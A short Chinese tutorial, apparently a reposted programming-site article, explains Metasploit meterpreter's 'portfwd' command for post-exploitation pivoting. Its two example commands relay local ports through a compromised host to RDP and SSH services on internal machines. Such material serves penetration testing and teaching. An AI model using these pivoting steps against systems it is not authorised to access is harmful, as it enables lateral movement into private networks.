Java教程

metasploit后渗透 之 portfwd端口重定向

本文主要是介绍metasploit后渗透 之 portfwd端口重定向,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
meterpreter > portfwd add -l 3333 -p 3389 -r 172.16.100.30
[*] Local TCP relay created: :3333 <-> 172.16.100.30:3389

该命令的意义是,将本地的3333端口的数据转发到远端172.16.100.30的3389端口上去(172.16.100.30是受控机);

 

当然也可以通过受控机将数据转发到内网的其他端口,如下:

meterpreter > portfwd add -l 3334 -p 22 -r 172.16.100.253
[*] Local TCP relay created: :3334 <-> 172.16.100.253:22

该命令的意义是,将本地的3334端口的数据转发到远端172.16.100.253的22端口上去(172.16.100.30是受控机);

 

这篇关于metasploit后渗透 之 portfwd端口重定向的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!